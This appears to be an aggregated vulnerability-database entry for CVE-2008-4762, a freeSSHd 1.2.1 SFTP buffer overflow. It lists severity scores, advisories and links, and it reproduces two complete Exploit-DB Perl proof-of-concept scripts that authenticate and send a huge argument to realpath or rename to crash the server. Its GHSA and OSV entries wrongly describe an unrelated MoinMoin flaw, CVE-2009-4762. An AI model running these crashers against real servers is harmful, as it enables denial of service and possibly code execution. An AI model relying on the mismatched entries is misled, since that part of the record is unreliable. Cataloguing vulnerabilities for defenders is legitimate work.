CVE-2008-4762
Published 2008-10-28
Priority P351 · critical 9 · CVSS 2.0
AV:N/AC:L/Au:S/C:C/I:C/A:C
EXPLOIT
EPSS 14.50% · 96.2th percentile
Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary code via a long argument to the (1) rename and (2) realpath parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freesshd | freesshd | — | — |
CVSS provenance
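| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| ghsa | — | 6.8 | MEDIUM | — |
| osv | — | 6.8 | MEDIUM | — |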
GHSA
ghsa_unreviewed·2022-05-14
CVE-2008-4762 [HIGH] CWE-119 GHSA-j28j-44j3-4pf2: Stack-based buffer overflow in freeSSHd 1
Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary code via a long argument to the (1) rename and (2) realpath parameters.
GHSA
ghsa·2022-05-02·CVSS 6.8
CVE-2009-4762 [MEDIUM] CWE-284 MoinMoin Improper Access Control vulnerability
MoinMoin 1.7.x before 1.7.3 and 1.8.x before 1.8.3 checks parent ACLs in certain inappropriate circumstances during processing of hierarchical ACLs, which allows remote attackers to bypass intended access restrictions by requesting an item, a different vulnerability than CVE-2008-6603.
OSV
osv·2010-03-29·CVSS 6.8
CVE-2009-4762 CVE-2009-4762: MoinMoin 1
MoinMoin 1.7.x before 1.7.3 and 1.8.x before 1.8.3 checks parent ACLs in certain inappropriate circumstances during processing of hierarchical ACLs, which allows remote attackers to bypass intended access restrictions by requesting an item, a different vulnerability than CVE-2008-6603.
No detection rules found.
Exploit-DB
exploitdb·2008-10-22
CVE-2008-4762 freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC)
```perl
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# FreeSSH 1.2.1 Crash #2 -- A Product of Fuzzing. Stay Tuned For More.
use Net::SSH2;
$host = "192.168.0.100";
$port = 22;
$username = "test";
$password = "test";
$dos = "A" x 262145;
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$realpath = $sftp->realpath($dos);
$ssh2->disconnect();
exit;
# milw0rm.com [2008-10-22]
```
Exploit-DB
exploitdb·2008-10-22
CVE-2008-4762 freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)
```perl
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned.
use Net::SSH2;
$host = "192.168.0.187";
$port = 22;
$username = "test";
$password = "test";
$dos = "A" x 550000;
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$rename = $sftp->rename($dos, "test");
$ssh2->disconnect();
exit;
# milw0rm.com [2008-10-22]
```
No writeups or analysis indexed.
http://secunia.com/advisories/32366
http://securityreason.com/securityalert/4515
http://www.securityfocus.com/archive/1/497746/100/0/threaded
http://www.securityfocus.com/bid/31872
http://www.securitytracker.com/id?1021096
http://www.vupen.com/english/advisories/2008/2897
https://exchange.xforce.ibmcloud.com/vulnerabilities/46046
https://www.exploit-db.com/exploits/6800
https://www.exploit-db.com/exploits/6812